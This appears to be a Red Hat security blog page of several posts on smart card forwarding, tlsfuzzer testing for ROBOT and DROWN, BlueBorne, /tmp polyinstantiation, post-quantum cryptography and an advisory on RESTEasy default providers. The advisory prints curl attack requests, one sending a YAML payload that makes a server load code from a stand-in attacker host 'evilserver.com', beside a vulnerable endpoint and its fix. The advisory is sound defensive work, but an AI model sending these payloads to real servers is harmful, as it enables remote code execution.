Warning message

Log in to add comments.

Latest Posts

  • Smart card forwarding with Fedora

    Authored by: Daiki Ueno

    Smart cards and hardware security modules (HSM) are technologies used to keep private keys secure on devices physically isolated from other devices while allowing access only to an authorized user. That way only the intended user can use that device to authenticate, authorize, or perform other functions that involve the private keys while others are prevented from gaining access. These devices usually come in the form of a USB device or token which is plugged into the local computer.

    In modern "cloud" computing, it is often desirable to use such a device like a smart card on remote servers. For example, one can sign software or documents on a remote server, use the local smart card to authenticate to Kerberos, or other possible uses.

    There are various approaches to tackle the problem of using a local smart card on a remote system, and on different levels of the smart card application stack. It is possible to forward the USB device holding the smart card, or forward the lower-level PC/SC protocol which some smart cards talk, or forward the high-level interface used to communicate with smart cards, the PKCS#11 interface. It is also possible to forward between systems one’s OpenPGP keys via GnuPG by using gpg-agent, or one’s SSH keys via ssh-agent. While these are very useful approaches when we are restricted to one particular set of keys, or a single application, they fail to provide a generic smart card or forwarding mechanism.

    Hence, in Fedora, we followed the approach of forwarding the higher level smart card interface, PKCS#11, as it provides the following advantages:

    • Unlike USB forwarding it does not require administrator access on the remote system, nor any special interaction with the remote system’s kernel.
    • It can be used to forward more than just smart cards, that is, a Trusted Platform Module (TPM) chip or any HSM can also be forwarded over the PKCS#11 interface.
    • Unlike any application-specific key forwarding mechanism, it forwards the whole feature set of the card, allowing it to access items like X.509 certificates, secret keys, and others.

    In the following sections we describe the approach and tools needed to perform that forwarding over SSH secure communication channels.

    Scenario

    We assume having a local workstation, and a remote server. On the local computer we have inserted a smart card (in our examples we will use a Nitrokey card, which works very well with the OpenSC drivers). We will forward the card from the workstation to the remote server and demonstrate various operations with the private key on the card.

    Installing required packages

    Fedora, by default, includes smart card support; the additional components required to forward the card are available as part of the p11-kit-server package, which should be installed on both client and server. For the following examples we will also use some tools from gnutls-utils; these tools can be installed with DNF as follows:

     $ dnf install p11-kit p11-kit-server gnutls-utils libp11
    

    The following sections assume both local and remote computers are running Fedora and the above packages are installed.

    Setting up the PKCS#11 forwarding server on a local client

    To forward a smart card to a remote server, you first need to identify which smart cards are available. To list the smart cards currently attached to the local computer, use the p11tool command from the gnutls-utils package. For example:

     $ p11tool --list-tokens
     ...
     Token 6:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: opensc-pkcs11.so
     ...
    

    This is the entry for the card I’d like to forward to remote system. The important pieces are the ‘pkcs11:’ URL listed above, and the module name. Once we determine which smart card to forward, we expose it to a local Unix domain socket, with the following p11-kit server command:

     $ p11-kit server --provider /usr/lib64/pkcs11/opensc-pkcs11.so “pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29”
    

    Here we provide, to the server, the module location (optional) with the --provider option, as well as the URL of the card. We used the values from the Module and URL lines of the p11tool output above. When the p11-kit server command starts, it will print the address of the PKCS#11 unix domain socket and the process ID of the server:

    P11_KIT_SERVER_ADDRESS=unix:path=/run/user/12345/p11-kit/pkcs11-12345
    P11_KIT_SERVER_PID=12345
    

    For later use, set the variables output by the tool on your shell prompt (e.g., copy and paste them or call the above p11-kit server command line with eval $(p11-kit server ...)).

    Forwarding and using the PKCS#11 Unix socket on the remote server

    On the remote server, we will initially forward the previously generated PKCS#11 unix socket, and then access the smart card through it. To access the forwarded socket as if it were a smart card, a dedicated PKCS#11 module p11-kit-client.so is provided as part of the p11-kit-server package.

    Preparing the remote system for PKCS#11 socket forwarding

    One important detail you should be aware of, is the file system location of the forwarded socket. By convention, the p11-kit-client.so module utilizes the "user runtime directory", managed by systemd: the directory is created when a user logs in, and removed upon logout, so that the user doesn't need to manually clean up the socket file.

    To locate your user runtime directory, do:

     $ systemd-path user-runtime
     /run/user/1000
    

    The p11-kit-client.so module looks for the socket file under a subdirectory (/run/user/1000/p11-kit in this example). To enable auto-creation of the directory, do:

     $ systemctl --user enable p11-kit-client.service
    

    Forwarding the PKCS#11 socket

    We will use ssh to forward the local PKCS#11 unix socket to the remote server. Following the p11-kit-client convention, we will forward the socket to the remote user run-time path so that cleaning up on disconnect is not required. The remote location of the run-time path can be obtained as follows:

    $ ssh <user>@<remotehost> systemd-path user-runtime
    /run/user/1000
    

    The number at the end of the path above is your user ID in that system (and thus will vary from user to user). You can now forward the Unix domain socket with the -R option of the ssh command (after replacing the example path with the actual run-time path):

     $ ssh -R /run/user/<userID>/p11-kit/pkcs11:${P11_KIT_SERVER_ADDRESS#*=} <user>@<remotehost>
    

    After successfully logging in to the remote host, you can use the forwarded smart card as if it were directly connected to the server. Note that if any error occurs in setting up the forwarding, you will see something like this on your terminal:

    Warning: remote port forwarding failed for listen path /run/user/...
    

    Using the forwarded PKCS#11 socket

    Let’s first make sure it works by listing the forwarded smart card:

     $ ls -l /run/user/1000/p11-kit/pkcs11
     $ p11tool --provider /usr/lib64/pkcs11/p11-kit-client.so --list-tokens
     ...
     Token 0:
             URL: pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29
             Label: UserPIN (Daiki's token)
             Type: Hardware token
             Manufacturer: www.CardContact.de
             Model: PKCS#15 emulated
             Serial: DENK0000000
             Module: (null)
     ...
    

    We can similarly generate, copy objects or test certificates to the card using the same command. Any applications which support PKCS#11 can perform cryptographic operations through the client module.

    Registering the client module for use with OpenSSL and GnuTLS apps

    To utilize the p11-kit-client module with OpenSSL (via engine_pkcs11 provided by the libp11 package) and GnuTLS applications in Fedora, you have to register it with p11-kit. To do it for the current user, use the following commands:

    $ mkdir .config/pkcs11/modules/
    $ echo “module: /usr/lib64/pkcs11/p11-kit-client.so” >.config/pkcs11/modules/p11-kit-client.module
    

    Once this is done both OpenSSL and GnuTLS applications should work, for example:

    $ URL=”pkcs11:model=PKCS%2315%20emulated;manufacturer=www.CardContact.de;serial=DENK0000000;token=UserPIN%20%28Daiki%27s%20token%29”
    
    # Generate a key using gnutls’ p11tool
    $ p11tool --generate-ecc --login --label test-key “$URL”
    
    # generate a certificate request with the previous key using openssl
    $ openssl req -engine pkcs11 -new -key "$URL;;object=test-key;type=private;pin-value=XXXX" \
             -keyform engine -out req.pem -text -subj "/CN=Test user"
    

    Note that the token URL remains the same in the forwarded system as in the original one.

    Using the client module with OpenSSH

    To re-use the already forwarded smart card for authentication with another remote host, you can run ssh and provide the -I option with p11-kit-client.so. For example:

     $ ssh -I /usr/lib64/pkcs11/p11-kit-client.so <user>@<anotherhost>
    

    Using the forwarded socket with NSS applications

    To register the forwarded smart card in NSS applications, you can set it up with the modutil command:

     $ sudo modutil -dbdir /etc/pki/nssdb -add p11-kit-client -libfile /usr/lib64/pkcs11/p11-kit-client.so
     $ modutil -dbdir /etc/pki/nssdb -list
     ...
       3. p11-kit-client
         library name: /usr/lib64/pkcs11/p11-kit-client.so
            uri: pkcs11:library-manufacturer=OpenSC%20Project;library-description=OpenSC%20smartcard%20framework;library-version=0.17
          slots: 1 slot attached
         status: loaded
    
          slot: Nitrokey Nitrokey HSM (010000000000000000000000) 00 00
         token: UserPIN (Daiki's token)
           uri: pkcs11:token=UserPIN%20(Daiki's%20token);manufacturer=www.CardContact.de;serial=DENK0000000;model=PKCS%2315%20emulated
    

    Conclusion

    With the smart card forwarding described, we make it easy to forward your smart card, or any device accessible under PKCS#11, to the “cloud”. The forwarded device can then be used by OpenSSL, GnuTLS, and NSS applications as if it was a local card, enabling a variety of applications which were not previously possible.

    Posted: 2018-01-16T14:30:00+00:00
  • Detecting ROBOT and other vulnerabilities using Red Hat testing tools.

    Authored by: Hubert Kario

    The TLS (Transport Layer Security) protocol, also known as SSL, underpins the security of most Internet protocols. That means the correctness of its implementations protects the safety of communication across network connections.

    The Red Hat Crypto Team, to verify the correctness of the TLS implementations we ship, has created a TLS testing framework which is developed as the open source tlsfuzzer project. That testing framework is being used to detect and fix issues with the OpenSSL, NSS, GnuTLS, and other TLS software we ship.

    Recently, Hanno Böck, Juraj Somorovsky, and Craig Young, responsible for discovery of the ROBOT vulnerability, have identified that tlsfuzzer was one of only two tools able to detect the vulnerability at the time they discovered it. This article describes how to use tlsfuzzer to test for two common vulnerabilities - DROWN and ROBOT (which is an extension of the well known Bleichenbacher attack).

    Getting tlsfuzzer

    tlsfuzzer requires three Python libraries:

    six is available in Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7 and can be installed using the following command:

    yum install python-six
    

    In Fedora both Python 2 and Python 3 are available, so it needs to be installed using
    the following command:

    dnf install python2-six
    

    Note: tlsfuzzer and its dependencies are compatible with Python 2.6, Python 2.7, and Python 3, but because Python 2 is the default python on the above mentioned systems, the instructions below will use Python 2 to run it.

    Remaining libraries can be downloaded to a single directory and run from there:

    git clone https://github.com/tomato42/tlsfuzzer.git                             
    cd tlsfuzzer                                                                    
    git clone https://github.com/warner/python-ecdsa .python-ecdsa                  
    ln -s .python-ecdsa/src/ecdsa/ ecdsa                                            
    git clone https://github.com/tomato42/tlslite-ng .tlslite-ng                    
    ln -s .tlslite-ng/tlslite/ tlslite
    

    Running tests

    The tests that can be run live in scripts/ directory. The test for ROBOT (and Bleichenbacher) is called test-bleichenbacher-workaround.py. The test for DROWN is called test-sslv2-force-cipher.py.

    To run those scripts, it's necessary to provide them with the hostname and port the server is running on. For a server running on host example.com on port 443, the commands are as follows:

    PYTHONPATH=. python scripts/test-sslv2-force-cipher.py -h example.com -p 443
    PYTHONPATH=. python scripts/test-bleichenbacher-workaround.py -h example.com -p 443
    

    If the test finishes with a summary like this:

    Test end
    successful: 21
    failed: 0
    

    It means the server passed the tests successfully (behaves in a standards-compliant way) and likely is not vulnerable.

    Note: The server can be vulnerable to the Bleichenbacher attack even if it passes the test (as the attack can use timing of the responses, not only contents or presence). As this script does not measure times of the responses, it cannot detect that covert channel. Passing the test does mean that the attack is much harder to perform, if the server is vulnerable in reality.

    Many scripts support additional options that may workaround some peculiarities of the server under test. A listing of them can be obtained by running the script with --help option.

    Interpreting failures

    Unfortunately, as the tool is primarily aimed at developers, interpreting the errors requires a bit of python knowledge and understanding of TLS. Below is a description of the most common harmless errors that can happen during execution of the script.

    Tests in general verify if the server under test is RFC-compliant (does it follow standards like RFC 5246). As the standards are continuously updated to workaround or mitigate known vulnerabilities, standards compliance is a good indicator of overall robustness of the implementation. Fortunately, not all departures from behaviour prescribed in the RFCs are vulnerabilities. It does, however, make testing of such non-compliant implementations harder, and more of a guesswork though.

    That being said, some errors in test execution may be a result of unexpected server configuration rather than mismatch between expectation of tlsfuzzer and the server. Read below how to workaround them.

    Note: A Failure reported by a script is an indicator of a server not following the expected behaviour, not of failure to communicate. Similarly, a successful test is a test in which server behaved as expected, and does not indicate a successful connection.

    General error

    When execution of a script encounters an error, it will print a message like this:

    zero byte in first byte of random padding ...
    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert object at 0x7f96e7e56a90> (child: <tlsfuzzer.expect.ExpectClose object at 0x7f96e7e56ad0>) with last message being: <tlslite.messages.Message object at 0x7f96e79f4090>
    Error while processing
    Traceback (most recent call last):
      File "scripts/test-bleichenbacher-workaround.py", line 250, in main
        runner.run()
      File "/root/tlsfuzzer/tlsfuzzer/runner.py", line 178, in run
        node.process(self.state, msg)
      File "/root/tlsfuzzer/tlsfuzzer/expect.py", line 571, in process
        raise AssertionError(problem_desc)
    AssertionError: Expected alert description "bad_record_mac" does not match received "handshake_failure"
    

    First line indicates the name of the scenario that was run, it can be used to reproduce the run alone (by passing it as the last parameter to the script file, like this: ...workaround.py -h example.com -p 443 "zero byte in first byte of random padding").

    Second line indicates at which point in execution the failure happened, in this case during ExpectAlert.

    Last line indicates the kind of error condition that was detected, in this case the description of the received alert message didn't match the expected one.

    Connection refused or timeout in Connect error Pattern:

    Error encountered while processing node <tlsfuzzer.messages.Connect ...
    ...
        sock.connect((self.hostname, self.port))
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    error: [Errno 111] Connection refused
    

    and

    Error encountered while processing node <tlsfuzzer.messages.Connect...
    ...
      File "/usr/lib64/python2.7/socket.py", line 228, in meth
        return getattr(self._sock,name)(*args)
    timeout: timed out
    

    The hostname or the port are incorrect for the server or some system on-route blocks communication with the server.

    Unexpected message - Certificate Request Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectServerHelloDone
    ...
    AssertionError: Unexpected message from peer: Handshake(certificate_request)
    

    The server is configured to perform client certificate based authentication and the script does not know how to handle it. The server needs to be reconfigured to not request certificate from the client to perform that test.

    Unexpected message - Application Data Pattern:

    Error encountered while processing node <tlsfuzzer.expect.ExpectAlert ...
    ...
    AssertionError: Unexpected message from peer: ApplicationData(len=8000)
    

    Note: for most tests it will be ExpectAlert, but in general, the node in question
    is the one right after ExpectApplicationData in the script.

    In the above mentioned test scripts, that is not an indication of ROBOT or DROWN vulnerability, but it may indicate other issues. The USAGE.md document of the tlsfuzzer project includes more information about interpreting this and other failures.

    Posted: 2017-12-12T13:56:54+00:00
  • Security is from Mars, Developers are from Venus…...or ARE they?

    Authored by: Christopher Robinson

    It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It has been well-known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but it also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.

    Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.

    Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.

    Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re also equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked-off a new site topic that focuses on secure programing and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.

    In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!

    Posted: 2017-11-16T15:00:00+00:00
  • Abuse of RESTEasy Default Providers in JBoss EAP

    Authored by: Jason Shepherd

    Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the Content-Type HTTP Header which the client specifies. Some of the default providers where found to have vulnerabilities which have now been removed from JBoss EAP and it's upstream Restful webservice project, RESTEasy.

    The attack vector

    There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:

    • @Consumes annotation was present specifying wildcard mediaType {*/*}
    • @Consumes annotation was not present on webservice endpoint
    • Webservice endpoint consumes a multipart mediaType

    Here's an example of what a vulnerable webservice would look like:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice how there is no @Consumes annotation on the doConcat method.

    The vulnerabilities

    CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

    If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending a HTTP Request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializationProvider and could contain a malicious payload generated with ysoserial2 or similar. A remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

    Here's an example:

    curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'
    

    CVE-2016-9606 also exploited the default providers of Resteasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the Snakeyaml library from Resteasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

    SnakeYaml allows loading classes with a URLClassloader, using it's ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.

    An example of a malicious request is as follows:

    curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat
    

    Where evilserver.com is a host controlled by the malicious actor

    Again, you can see the use of Content-Type, HTTP Header, which tricks RESTEasy into using YamlProvider, even though the developer didn't intend for it to be accessible.

    How to stay safe

    The latest versions of EAP 6.4.x, and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either of EAP 6.4.x, or 7.0.x.

    If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

    import java.util.*;
    import javax.ws.rs.*;
    import javax.ws.rs.core.*;
    
    @Path("/")
    public class PoC_resource {
    
            @POST
            @Path("/concat")
            @Consumes("application/json")
            public Map<String, String> doConcat(Pair pair) {
                    HashMap<String, String> result = new HashMap<String, String>();
                    result.put("Result", pair.getP1() + pair.getP2());
                    return result;
            }
    
    }
    

    Notice this safe version added a @Consumes annotation with a mediaType of application/json

    This is good practice anyway, because if a HTTP client tries to send a request with a different Content-Type HTTP Header the application will give an appropriate error response, indicating that the Content-Type is not supported.


    1. https://issues.jboss.org/browse/RESTEASY-1269 

    2. https://github.com/frohoff/ysoserial 

    Posted: 2017-10-18T13:30:00+00:00
  • Kernel Stack Protector and BlueBorne

    Authored by: Red Hat Product...

    Today, a security issue called BlueBorne was disclosed, a vulnerability that could be used to attack sensitive systems via the Bluetooth protocol. Specifically, BlueBorne is a flaw where a remote (but physically quite close) attacker could get root on a server, without an internet connection or authentication, via installed and active Bluetooth hardware.

    The key phrase is “has the potential.” BlueBorne is still a serious flaw and one that requires patching and remediation, but most Red Hat Enterprise Linux users are at less risk of a direct attack. This is because Bluetooth hardware is not particularly common on servers, and our Server distributions of Red Hat Enterprise Linux don’t enable Bluetooth by default. But what about the desktop and workstation users of Red Hat Enterprise Linux and many other Linux distributions?

    Laptops and desktop machines commonly have Bluetooth hardware, and Workstation variants of Red Hat Enterprise Linux enable Bluetooth by default. It’s possible that a malicious actor could use a remote Bluetooth connector to gain access to personal workstations or terminals in an office building, allowing them to gain root for accessing sensitive data or potentially causing a cascading, system-wide attack. This is unlikely, however, on Linux operating systems, including Red Hat Enterprise Linux, thanks to Stack Protection.

    Stack Protection has been available for some time, having been introduced in some distributions back in 2005. We believe most major vendor distributions build their Linux kernels with Stack Protection enabled. For us, this includes Fedora Core (since version 5) and Red Hat Enterprise Linux (since version 6). With a kernel compiled in this way, the flaw turns from remote code execution to a remote crash (kernel panic). While having a physically local attacker being able to cause your machines to crash without touching them is bad, but it’s certainly not as bad as remote root.

    Red Hat, along with other Linux distribution vendors and the upstream Kernel security team, received one week advance notice on BlueBorne in order to prepare patches and updates. We used this time to evaluate the issue, develop the fix and build and test updated packages for supported versions of Red Hat Enterprise Linux. We also used the time to provide clearly understood information about the flaw, and how it impacted our products, which can be found in the Vulnerability Article noted below.

    Because Stack Protection works by adding a single check value (a canary) to the stack before the return address, a buffer overflow could overwrite other buffers on the stack before that canary depending on how things get ordered, so it was important for us to check properly. Based on a technical investigation we concluded that with Stack Protection enabled, it would be quite unlikely to be able to exploit this to gain code execution. We can’t completely rule it out, though, as an attacker may be able to use some other mechanism to bypass it (for example, if they can determine the value of the stack canary, maybe a race condition, combining it with some other flaw).

    On some architectures, notably ppc64 and s390x for Red Hat Enterprise Linux, Stack Protection is not used. However the Bluetooth kernel module is not available for our s390x Server variant. And ppc64 is only available in a Server variant, which doesn’t install the bluez package, making it not vulnerable by default even if Bluetooth hardware happens to be present.

    So if most distributions build kernels with Stack Protection, and Stack Protection has been available for many years before the flaw was introduced, where is the risk? Well, the problem is going to be all those kernels that have been built without Stack Protection turned on. So things like IoT devices that are Bluetooth enabled along with a vulnerable kernel compiled without Stack Protection will be most at risk from this flaw.

    Regardless of whether you have Stack Protection or not, patch your system. BlueBorne remains an important flaw and one that needs to be remedied as soon as possible via the appropriate updates.

    For Red Hat customers our page https://access.redhat.com/security/vulnerabilities/blueborne contains information on the patches we released today along with other details and mitigations. We’d like to thank Armis Labs for reporting this vulnerability.

    Posted: 2017-09-12T11:51:33+00:00
  • Polyinstantiating /tmp and /var/tmp directories

    Authored by: Huzaifa Sidhpurwala

    On Linux systems, the /tmp/ and /var/tmp/ locations are world-writable. They are used to provide a common location for temporary files and are protected through the sticky bit, so that users cannot remove files they don't own from the directory, even though the directory itself is world-writable. Several daemons/applications use the /tmp or /var/tmp directories to temporarily store data, log information, or to share information between their sub-components. However, due to the shared nature of these directories, several attacks are possible, including:

    Polyinstantiation of temporary directories is a proactive security measure which reduces chances of attacks that are made possible by /tmp and /var/tmp directories being world-writable.

    Setting Up Polyinstantiated Directories

    Configuring polyinstantiated directories is a three-step process (this example assumes that a Red Hat Enterprise Linux 7 system is used):

    First, create the parent directories which will hold the polyinstantiation child directories. Since in this case we want to setup polyinstantiated /tmp and /var/tmp, we create /tmp-inst and /var/tmp/tmp-inst as the parent directories.

    $ sudo mkdir --mode 000 /tmp-inst
    $ sudo mkdir --mode 000 /var/tmp/tmp-inst
    

    Creating these directories with mode 000 ensures that no users can access them directly. Only polyinstantiated instances mounted on /tmp (or /var/tmp) can be used.

    Second, configure /etc/security/namespace.conf. This file already contains an example configuration which we can use. In our case we will just uncomment the lines corresponding to /tmp and /var/tmp.

     /tmp     /tmp-inst/            level      root,adm 
     /var/tmp /var/tmp/tmp-inst/    level      root,adm
    

    This configuration specifies that /tmp must be polyinstantiated from a subdirectory of /tmp-inst. The third field specifies the method used for polyinstatiation which in our case is based on process MLS level. The last field is a comma-separated list of uids or usernames for whom the polyinstantiation is not performed1. More information about the configuration parameters can be found in /usr/share/doc/pam-1.1.8/txts/README.pam_namespace.

    Also ensure that pam_namespace is enabled in the PAM login configuration file. This should already be enabled by default on Red Hat Enterprise Linux systems.

     session    required    pam_namespace.so
    

    Third, setup the correct selinux context. This is a two-step process. In the first step we need to enable the global SELinux boolean for polyinstantiation using the following command:

    $ sudo setsebool polyinstantiation_enabled=1
    

    You can verify it worked by using:

    $ sudo getsebool polyinstantiation_enabled
    polyinstantiation_enabled --> on
    

    In the second step, we need to set the process SELinux context of the polyinstantiated parent directories using the following commands:

    $ sudo chcon --reference=/tmp /tmp-inst
    $ sudo chcon --reference=/var/tmp/ /var/tmp/tmp-inst
    

    The above commands use the selinux context of the /tmp and /var/tmp directories, respectively, as references and copies them to our polyinstantiated parent directories.

    Once the above is done, you can logoff and login, and each non-root user gets their own polyinstantiation of /tmp and /var/tmp directories.

    PrivateTmp feature of systemd

    Daemons running on systems which use systemd can now use the PrivateTmp feature. This enables a private /tmp directory for each daemon that is not shared by the processes outside of the namespace, however this makes sharing between processes outside the namespace using /tmp impossible. The main difference between polyinstantiated /tmp and PrivateTmp is that the former creates a per-user /tmp directory, while the latter creates a per-deamon or process /tmp.

    Conclusion

    In conclusion, while polyinstantiation will not prevent every type of attack (caused by flaws in the applications running on the system, or mis-configurations like weak root password, wrong directory/file permissions etc), it is a useful addition to your security toolkit that is straightforward to configure. Polyinstantiation can also be used for other directories such as /home. Some time ago, polyinstantiated /tmp by default was proposed for Fedora, but several issues caused the proposal to be denied.


    1. Default values include the root and the adm user. Since root is a superuser anyway, it does not make any sense to polyinstantiate the /tmp directory for the root user. 

    Posted: 2017-08-31T17:28:50+00:00
  • Post Quantum Cryptography

    Authored by: Huzaifa Sidhpurwala

    Traditional computers are binary digital electronic devices based on transistors. They store information encoded in the form of binary digits each of which could be either 0 or 1. Quantum computers, in contrast, use quantum bits or qubits to store information either as 0, 1 or even both at the same time. Quantum mechanical phenomenons such as entanglement and tunnelling allow these quantum computers to handle a large number of states at the same time.

    Quantum computers are probabilistic rather than deterministic. Large-scale quantum computers would theoretically be able to solve certain problems much quicker than any classical computers that use even the best currently known algorithms. Quantum computers may be able to efficiently solve problems which are not practically feasible to solve on classical computers. Practical quantum computers will have serious implications on existing cryptographic primitives.

    Most cryptographic protocols are made of two main parts, the key negotiation algorithm which is used to establish a secure channel and the symmetric or bulk encryption cipher, which is used to do the actual protection of the channel via encryption/decryption between the client and the server.

    The SSL/TLS protocol uses RSA, Diffie-Hellman (DH) or Elliptic Curve Diffie-Hellman (ECDH) primitives for the key exchange algorithm. These primitives are based on hard mathematical problems which are easy to solve when the private key is known, but computationally intensive without it. For example, RSA is based on the fact that when given a product of two large prime numbers, factorizing the product (which is the public key) is computationally intensive. By comparison, a quantum computer could efficiently solve this problem using Shor's algorithm to find the public key factors. This ability could allow a quantum computer to decrypt many of the cryptographic systems in use today. Similarly, DH and ECDH key exchanges could all be broken very easily using sufficiently large quantum computers.

    For symmetric ciphers, the story is slightly different. It has been proven that applying Grover's algorithm to break a symmetric (secret key) algorithm with key length of n bits by brute force requires time equal to roughly 2^(n/2) invocations of the underlying cryptographic algorithm, compared with roughly 2^n in the classical case, meaning that the strength of symmetric key lengths are effectively halved: AES-256 would have the same security against an attack using Grover's algorithm that AES-128 has against classical brute-force search. Therefore the situation with symmetric ciphers is stronger than the one with public key crypto systems.

    Hashes are also affected in the same way symmetric algorithms are: Grover's algorithm requires twice the hash size (as compared to the current safe values) for the same cryptographic security.

    Therefore, we need new algorithms which are resistant to quantum computations. Currently there are 5 proposals, which are under study:

    Lattice-based cryptography

    A lattice is the symmetry group of discrete translational symmetry in n directions. This approach includes cryptographic systems such as Learning with Errors, Ring-Learning with Errors (Ring-LWE), the Ring Learning with Errors Key Exchange and the Ring Learning with Errors Signature. Some of these schemes (like NTRU encryption) have been studied for many years without any known feasible attack vectors and hold great promise. On the other hand, there is no supporting proof of security for NTRU against quantum computers.

    Lattice is interesting because it allows the use of traditional short key sizes to provide the same level of security. No short key system has a proof of hardness (long key versions do). The possibility exists that a quantum algorithm could solve the lattice problem, and the short key systems may be the most vulnerable.

    Multivariate cryptography

    Multivariate cryptography includes cryptographic systems such as the Rainbow scheme which is based on the difficulty of solving systems of multivariate equations. Multivariate signature schemes like Rainbow could provide the basis for a quantum secure digital signature, though various attempts to build secure multivariate equation encryption schemes have failed.

    Several practical key size versions have been proposed and broken. EU has standardized on a few; unfortunately those have all been broken (classically).

    Hash-based cryptography

    Hash based digital signatures were invented in the late 1970s by Ralph Merkle and have been studied ever since as an interesting alternative to number theoretic digital signatures like RSA and DSA. The primary drawback for any Hash based public key is a limit on the number of signatures that can be signed using the corresponding set of private keys. This fact reduced interest in these signatures until interest was revived due to the desire for cryptography to resist attack by quantum computers. Schemes that allow an unlimited number of signatures (called 'stateless') have now been proposed.

    Hash based systems are provably secure as long as hashes are not invertible. The primary issue with hash based systems is the signature sizes (quite large). They also only provide signatures, not key exchange.

    Code-based cryptography

    Code-based cryptography includes cryptographic systems which rely on error-correcting codes. The original McEliece signature using random Goppa codes has withstood scrutiny for over 30 years. The Post Quantum Cryptography Study Group sponsored by the European Commission has recommended the McEliece public key encryption system as a candidate for long term protection against attacks by quantum computers. The downside, however, is that code based cryptography has large key sizes.

    Supersingular elliptic curve isogeny cryptography

    This cryptographic system relies on the properties of supersingular elliptic curves to create a Diffie-Hellman replacement with forward secrecy. Because it works much like existing Diffie-Hellman implementations, it offers forward secrecy which is viewed as important both to prevent mass surveillance by governments but also to protect against the compromise of long term keys through failures.

    Implementations

    Since this is a dynamic field with cycles of algorithms being defined and broken, there are no standardized solutions. NIST's crypto competition provides a good chance to develop new primitives to power software for the next decades. However it is important to mention here that Google Chrome, for some time, has implemented the NewHope algorithm which is a part of Ring Learning-with-Errors (RLWE) family. This experiment has currently concluded.

